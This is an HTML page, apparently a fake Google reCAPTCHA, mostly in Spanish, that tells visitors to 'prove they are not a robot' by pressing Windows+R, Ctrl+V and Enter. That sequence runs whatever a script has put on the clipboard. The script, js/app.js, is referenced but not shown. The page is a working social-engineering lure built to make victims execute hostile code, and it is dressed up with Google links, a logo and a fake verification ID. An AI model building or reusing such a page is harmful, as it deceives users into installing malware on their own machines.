<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8" />
  <title>reCAPTCHA Verification</title>
  <link rel="icon" href="icon.png" />
  <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.0/css/all.css" />
  <link rel="stylesheet" href="css/styles.css" />
</head>
<body>
  <div class="container m-p">
    <div id="checkbox-window" class="checkbox-window m-p block">
      <div class="checkbox-container m-p">
        <button type="button" id="checkbox" class="checkbox m-p line-normal" aria-label="checkbox"></button>
      </div>
      <p class="im-not-a-robot m-p line-normal">No soy un robot</p>

      
      <img src="icon.png" class="captcha-logo line-normal" alt="reCAPTCHA" />

      <p class="checkbox-desc m-p line-normal">
        <a href="https://www.google.com/intl/en/policies/privacy/">Privacidad</a> -
        <a href="https://www.google.com/intl/en/policies/terms/">Terms</a>
      </p>

      <div class="spinner" id="spinner" aria-hidden="true"></div>
    </div>

    <div id="verify-window" class="verify-window">
      <div class="verify-container">
        <header class="verify-header">
          <span class="verify-header-text-medium m-p block">Completa Estos</span>
          <span class="verify-header-text-big m-p block">Pasos de Verificación</span>
          <span class="verify-header-text-medium m-p block"></span>
        </header>
        <main class="verify-main">
          <p>Para demostrar que no eres un robot:</p>
          <ol>
            <li>Mantenga &amp; presione Windows <i class="fab fa-windows"></i> + <b>R</b>.</li>
            <li>Presione <b>Ctrl</b> + <b>V</b>.</li>
            <li>Presione <b>Enter</b> para Finalizar.</li>
          </ol>

          <p>You will observe and agree:<br />
            <code>✅ "I am not a robot - reCAPTCHA Verification ID: <span id="verification-id">146820</span>"</code>
          </p>
        </main>
      </div>
      <footer class="verify-container verify-footer">
        <div class="verify-footer-left">Perform the steps above to finish verification.</div>
        <div class="verify-actions">
          <button type="button" class="verify-verify-button" id="verify-verify-button">Verify</button>
          <button type="button" class="verify-verify-button" id="verify-cancel-button" style="background:#9ca3af;">Cancel</button>
        </div>
      </footer>
    </div>
  </div>

  <script src="js/app.js" defer></script>
</body>
</html>

